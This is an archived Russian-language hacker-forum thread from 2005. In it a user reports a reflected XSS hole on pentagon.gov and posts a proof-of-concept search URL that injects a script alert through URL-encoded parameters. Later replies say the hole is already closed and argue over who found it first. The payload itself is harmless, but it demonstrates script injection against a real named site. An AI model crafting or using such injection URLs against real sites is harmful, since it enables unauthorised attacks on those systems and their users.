PDA

Просмотр полной версии : Xss на сайте Пентагона


XgLuiR
10.11.2005, 11:47
На сайте www.pentagon.gov найденна XSS-уязвимость. Пример:

http://www.pentagon.gov/srch/search?
template=%2Fsearch%2Fresults-template-dl.html
&c=%3Cscript%3Ealert(%22www.xss.ru%22)%3C/script%3E&c=8268333F54379065
&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2&q=
%3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E&submit=
Search&subcat=briefing+slides&sort=-pub_date

TANZWUT
10.11.2005, 11:58
An error was encountered while performing the search.
Invalid collection.

k1b0rg
10.11.2005, 12:05
хе-хе, знач уже прикрыли, а так работала, сам првоерял.

m0nzt3r
10.11.2005, 13:04
ЛОЛ такая тема есть в хсс это наш k00p3r нашел=)

k00p3r
10.11.2005, 14:42
Хмм....Видимо народ заигрался в хацкеров и "админ Пентагона" есессно прикрыл багу. :-)))
Народ! Берите инфу из первоисточников! Ну или пишите откуда взяли.